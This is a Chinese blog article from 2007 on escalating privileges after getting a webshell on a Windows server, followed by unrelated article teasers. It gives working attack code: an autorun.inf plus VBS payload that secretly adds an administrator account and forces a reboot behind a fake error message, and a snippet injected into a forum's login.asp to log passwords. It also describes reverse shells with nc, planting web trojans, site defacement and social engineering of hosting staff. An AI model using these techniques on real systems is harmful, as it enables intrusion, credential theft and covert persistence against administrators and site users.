另类巧妙的思路:旁门左道的入侵

原创 2007年09月12日 03:18:00
另类巧妙的思路:旁门左道的入侵

BY 剑心[B.C.T]

很多的时候,入侵并不是单纯靠技术的,有很多是运气因素,更重要的是如何对一些摆在你面前的一些安全破绽的攻击。我很相信安全意识这个东西,当一台服务器摆在你面前时,大概的看下就知道服务器的安全到底如何了,特别是对于入侵之后的webshell的提升,更多的依赖于管理员的安全意识。由于本人的技术不好,不能自己发现溢出漏洞,所以在入侵时只能搞些旁门左道的东西了。也许这些都是被管理员和高手所不耻的,但是在实际中,这些伎俩的威胁不容忽视,你根本不知道什么时候你的系统就会变得到处是陷阱,加上安全意识薄弱一点的话,对系统的危害还是很大的,我就来说说我平时用到的一些旁门左道的方法吧!(大家以后不要鄙视我就行了^_^)
首先我们获得一个webshell,因为我说的旁门左道主要就是用在得到webshell之后的权限提升,webshell相信大家手里都有一大把吧!没有也没有关系,脚本漏洞那么多,看看以前的文章自己上网找找吧!^_^。得到webshell以后,我一般都是先看看系统的进程列表,砍客的木马和最近的海洋木马都有这个功能。我用的就是海洋的修改版,可以看到很详细的信息,你没有这样的木马的话也没有关系,我这里有别人给我的一段代码,放到服务器上就可以看进程了:

<%
dim obj //定义变量//
for each obj in getObject("WinNT://.") //循环取得系统本机对象//
err.clear //错误处理//
%>
<%=obj.Name%> //显示对象Name属性,即显示系统用户组//
<%if err then
else
%>(<%=obj.DisplayName%>)<%end if%> //显示当前服务名//
<br><%=obj.path%> //显示当前服务程序路径//

保存为asp文件访问看看吧!如图一。这里要仔细看看,服务都装在哪里,还有哪些服务,这样就可以知道管理员的水平到底怎么样了。如果你什么也没有得到的话说明管理员不是很差劲,就要小心了!呵呵,服务都装在默认的路径下啊,默认Guest没有什么权限,不过如果你发现有不在默认路径下的服务,就试着执行命令看看,可以执行的话就可以把我们自己的程序传上去改掉服务的名字,将自己的程序替换成他的(这里要求对方的程序路径下是默认的权限哦)。windows默认是不允许删除正在执行的文件但是可以改名,呵呵,这里只要服务器重起我们的程序就可以执行了,当然是以牺牲对方的服务为代价的了,建议搞瑞星之类的杀毒软件。这里因为是要等服务器重起,但是一周左右都会重起的,概率很大,windows太不稳定了。呵呵,阴险吧,一切都是为了权限,不然怎么叫旁门左道呢?如果你真的比较性急,我也不建议你跑去D人家,是托管主机的话直接冒充管理员让托管机房的人重起比较好,成功率据说很高的啊!前提是你要十分了解对方。当然,如果机器有 Server-u并且版本比较低的话就不用那么麻烦了,如何提权就看看以前的文章吧,我就不多说了。但是看看这里,我们的情况不怎么好,看看服务的路径就知道,就是几个防火墙和杀毒软件,全部默认啊,可以执行命令也没有办法替换服务了。我们再看看,好多默认的服务都没有关,这是一个对安全重视的网管所不会做的,至少那个什么ClipBook服务就是个例子(排除对自己超级自信的网管!)。可以看出他的安全意识至少不是那么到位,我们肯定有空子可以钻的,哈哈!接着往后看吧,用Fso查看磁盘发现都可以浏览,还可写,看来都是默认的设置,还可以执行命令,网管果然比较$#%$@$#%啊!其实开始我就应该知道,因为他的web页面和数据库都是默认设置,我就是那样得到webshell的!基本可以确定我们的对手是怎么样的一个人了!呵呵。
但是好象还是没有什么用,可以执行命令,将nc传上去还可以得到了反向的cmdshell,乱转悠但还是没有什么思路!管理员不懂做安全配置但是微软的补丁不知道为什么打得很全,本地的溢出都不好用!郁闷。那就再在他的硬盘里看看,嘿嘿,根目录可写啊,想起什么了?记不记得系统默认的那个 autorun.inf啊,放在磁盘根目录,双击的话会执行那个指定程序的呵,我们就放个autorun.inf上去,哈哈。如图二。这样他的硬盘下就有我们放置的陷阱了,等管理员来了。当然,不能直接用autonrun.inf运行我们的木马,这样管理员打不开硬盘一定会奇怪的,我写了个隐蔽点的代码:

Dim fso, MyFile //定义变量//
Set fso = createObject("Scripting.FileSystemObject") //取得Fso对象//
Set MyFile = fso.GetFile("d:/autorun.inf") //打开文件d:/autorun.inf//
MyFile.delete //删除文件//

dim sh //定义变量//
set sh=createobject("wscript.shell") //创建对象//
sh.run "net user jnc lxfxd /add",0 //Wsh执行命令添加帐户jnc//
sh.run "net localgroup administrators jnc /add",0 //将jnc帐户加为管理员//
sh.run "attrib +h +s d:/run.vbs",0 //将我们的run.vbs加上系统隐藏属性//
sh.run "shutdown -r -t 30 -c windows读盘错误,需要重新启动以读取分区表.",0 //重起机器,后面的是迷惑管理员//

保存为run.vbs,与后面的autorun.inf设置为隐藏之后一起放到磁盘根目录下。如果是2000,可以把shutdown.exe传上去,这些代码的意思是先删除autotun.inf,然后加jnc为管理员,最后弹出对话框,机器重起,重起后什么痕迹都没有了,除了多个管理员用户。提示信息可以自己改,迷惑性越大越好!在autorun.inf里写上下面的代码:


[autorun]

OPEN=wscript run.vbs

一定要是wscript.exe啊,不然有黑的对话框出来就麻烦了。应该有高手知道如何用脚本打开磁盘的,但是我不会写,不过这样已经够狠的了,想想现在有哪个打开磁盘时不是双击啊!
除了这个,还有个东西很值得提下,就是以前的黑x介绍的那个目录欺骗工具,管理员误以为是文件夹就可以加帐户的那个。不过我得到的程序运行程序成功后总有个 bat文件,删不掉,是人都看出来有鬼!我就不要运行程序的功能了,直接传到管理员去得多的地方,嘿嘿,根目录下放一个,网站目录放一个,……。如图三,也不要太多了,放到管理员眼皮底下等他运行就可以了,我是不知道如何编程啊,不然写个名字诱惑性更大的程序效果更好。我们有帐户又有可以执行命令的cmdshell,没有3389也可以用runas命令啊,这机器就是我们的了!可是这样安全意识的管理员一般很懒,不一定会经常上线,不然不会这么多漏子。嘿嘿,不要着急,等什么都弄完了再想法让他上线检查自己的电脑,这样才可以运行我们的程序。
再找找其他有不有空子可以钻。去看看他网站上有什么东西吧,他这样的管理员各个地方用的密码不会都不一样吧?网站上有个动网sp2的,把数据库由asp的copy成mdb的下载下来看看。在Dv_log里没有找到密码,看到了注册时间最早的那个家伙(这个当然就是管理员了自己!)的密码,拿下来跑跑。可是半天也没有跑出来啊,急!我破解不出来我还不会等着你往我家里送啊?干脆找到了bbs的login.asp在里面加了点东西:

<%
dim Name,password,fso,file //定义后面要用到的变量//
Name = Request("username") //取得浏览器传过来的username变量//
Password = Request("password") //取得浏览器传过来的Password变量//
Const ForReading = 1, ForWriting = 2, ForAppending = 8 //定义后面写文件的参数//
Set fso = Server.createObject("Scripting.FileSystemObject") //取得Fso对象,准备写文件//
Const path = "D:/mir3/bbs/admin_list.asp" //定义要写的文件路径//
set file=fso.opentextfile(path, ForAppending, TRUE) //取得文件对象//
file.write(Name) & " " //写取得的用户名//
file.write(Password) & "||" //写取得的密码,并用||分隔开//
file.close //关闭文件//
set file = nothing //释放变量//
set fso = nothing //释放变量//
%>

注意的是里面request的变量,具体的字段自己改!还有后面你要存放的文件地址,这个也根据情况自己填了,以后经常来看看得到的东西就行了,我比较关注的是admin!如图四。又一个个陷阱挖好了,等管理员钻了。可是好象不知道他什么时候登陆呢,我干脆去当会坏人,发了几个人身攻击的帖子,灌了一会恶意的水就不信你管理员熬得住不上来删帖子!(不是我的本意,大家原谅!)嘿嘿
再转悠了几下子,发现C:/Program Files下有3721,乖乖,难道服务器还有人拿来上网啊?不过也不排除那种可能,二话不说,找人要了最新的网页木马的代码,找网站几个关键的页面插进去,如图五哈哈,又是一个陷阱,只要你打开Ie上网!再找找,发现这个管理员还好,服务器上不聊QQ,也没有什么游戏,要不然我们又可以给他捆上个东西,捆什么?当然是木马了!我还真遇到有人在服务器聊QQ玩连连看外加看少儿不易的东西,呵呵,这样的机器要是还搞不定就真是你的问题了。
这个机器上基本上已经到处是陷阱了,只等管理员上线了,我可等不急了,催催他吧!拿出经典的黑站图片,插入网页木马在里面替换主页黑了他!(这里我了解管理员的水平所以这么做的,大家千万不要模仿!)就等他发现了,我们的陷阱可是在等他的啊!可是这个网站好象人气不怎么好,等了半天也没有人清除黑页。算了,中招是迟早的事了,你要是没有耐心在网站上找下他的QQ告诉他,注意社会工程学的应用啊,呵呵。
这里还要说点其他的,得到webshell和权限有更好的办法,上那个可以查询网站信息的站点,http://www.webhosting.info查询下他的信息,如图六,注册个相似的邮箱,或者直接打电话,然后冒充下站长说自己的密码丢了,偶不怎么擅长这个,所以都是听人家说的,可是上次跟小默上电信机房发现那里检查真不是怎么严,签个名就让进去,进去之后还什么都不管。一些服务器就那样开着,管理员已经登陆但是人不在,还有一些很重要的服务器都可以直接操作的,真不知道放个马到网关上去会怎么样,这里说的东西或许有些偏离黑客的技术了,但是,你敢保证这些旁门左道不会威胁到你的主机的安全?意识很重要,安全再怎么小心都不为过,好了,我就说到这里,有什么问题可以到在杂志补充或者论坛讨论,我的ID是剑心。
 

另类思路解决textbox不支持(半)透明背景颜色的问题

由于net平台的普及问题  为了尽可能的增加用户使用量  很多应用基于2.0写的 所以不考虑wpf 众所周知 winform 的textbox的颜色不能使用 带有 Alpha 属性的颜色 即半透...

C语言实现另类“多态”的一种思路

通过函数参数的不同(参数个数或者类型)实现多态已经有了一个思路,本文介绍另类的多态(参数相同),通过隐藏函数名的方式,采用指针函数和函数指针数组。...
  • yjbqzsf
  • yjbqzsf
  • 2015年01月19日 15:09
  • 294

重复插入数据的另类解决思路

在进行插入数据时,我们会先从数据库查询是否已经拥有该记录,但是最后会发现这个判断没有任何效果,导致这个判断失效的原因有很多,比如事务没有提交,或者多台服务器都执行了相同的代码,或者你的控制器(stru...

Node.js Web应用代码热更新的另类思路

背景 相信使用 Node.js 开发过 Web 应用的同学一定苦恼过新修改的代码必须要重启 Node.js 进程后才能更新的问题。习惯使用 PHP 开发的同学更会非常的不适用,大呼果然还是我大P...

IBatis下DAO单元测试另类思路

在说另类思路之前,先说下传统的测试方法: 0.准备一个干净的测试数据库环境   这个是前提 1.测试数据准备   使用文本,excel,或者wiki等,准备测试sql以及测试数据   利用d...

另类入侵法:旁注

  • 2006年02月23日 15:31
  • 5.7MB
  • 下载

DEDECMS 另类入侵.php

  • 2008年12月15日 12:12
  • 39KB
  • 下载

剑指offer——第一个只出现一次的字符(思路很基础,但有个方法比较巧妙)

题目描述 在一个字符串(1

这么巧妙的思路Common Subsequence

Common Subsequence 题源  http://acm.hrbust.edu.cn/vj/index.php?c=contest-contest&cid=141#problem/4 D -...

poj 1013 我的思路还是太直了,你看人家的多巧妙

  我承认是麻烦了点,但第一次的时候考虑一定要周到。全面而且细致的周全策划,必将AC,否则,万劫不复。  然后就看了看别人的代码,果然好思路。只用两个数组就搞定了f[12],t[12],1,若平衡,f...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:另类巧妙的思路:旁门左道的入侵
举报原因:
原因补充:

(最多只允许输入30个字)